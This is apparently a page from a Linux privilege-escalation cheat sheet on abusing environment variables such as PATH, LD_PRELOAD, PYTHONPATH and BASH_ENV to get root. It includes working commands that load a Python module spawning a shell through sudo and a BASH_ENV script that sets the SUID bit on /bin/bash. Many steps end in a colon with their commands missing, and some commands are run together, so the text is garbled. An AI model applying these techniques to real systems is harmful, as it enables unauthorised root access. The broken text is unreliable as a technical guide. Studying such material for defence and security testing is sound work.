This section covers techniques to exploit environment variables for privilege escalation.
PATH Variable Manipulation
The PATH environment variable contains a list of directories that are searched when you execute a command. If a program runs with higher privileges and relies on relative paths to execute binaries, it may be vulnerable.
Checking Current PATH
echo$PATH
Exploitation Technique
Identify a program running with elevated privileges that calls another program without specifying the full path:
# For example, a SUID binary that uses system("service apache2 start")strings/path/to/suid_binaryltrace/path/to/suid_binary
Create a malicious version of the called program in a writable directory:
Modify the PATH variable to include your directory first:
Run the vulnerable SUID program, which will execute your malicious version instead:
LD_PRELOAD and LD_LIBRARY_PATH
These environment variables control which shared libraries are loaded when a program runs.
LD_PRELOAD
LD_PRELOAD allows you to load a custom shared library before all others. If you can control this while running a command with sudo, you can potentially escalate privileges.
Check if LD_PRELOAD is preserved with sudo:
Create a malicious shared library:
Use LD_PRELOAD with sudo to execute a command:
LD_LIBRARY_PATH
LD_LIBRARY_PATH specifies directories where the program should look for libraries. This can be abused if a program searches for libraries in a specific order.
Check if a SUID binary uses shared libraries:
Create a malicious library with the same name as one of the used libraries:
Set LD_LIBRARY_PATH to your directory:
Execute the SUID binary:
Sudo Environment Variables
Sudo may preserve certain environment variables, which can be abused if misconfigured.
Check Preserved Variables
Common Exploitable Variables
LD_PRELOAD - As explained above
LD_LIBRARY_PATH - As explained above
PATH - Can lead to executing malicious binaries
PYTHONPATH - Can be used to load malicious Python modules
PERL5LIB - Can be used to load malicious Perl modules
Example with PYTHONPATH
If you can run a Python script with sudo:
Shell Environment Variables
Some programs can inherit shell functionality from environment variables:
BASH_ENV Exploitation
If a SUID binary executes sh internally, it might source BASH_ENV:
# Check if you can run a Python script with sudo
sudo -l
# Create a malicious Python module
echo 'import os; os.system("/bin/bash")' > /tmp/evil.py
# Set PYTHONPATH
export PYTHONPATH=/tmp
# Run the Python script with sudo
sudo python -c "import evil"
cat << EOF > /tmp/script.sh
chmod +s /bin/bash
EOF
chmod +x /tmp/script.sh
export BASH_ENV=/tmp/script.sh
/path/to/suid_binary # If this runs sh internally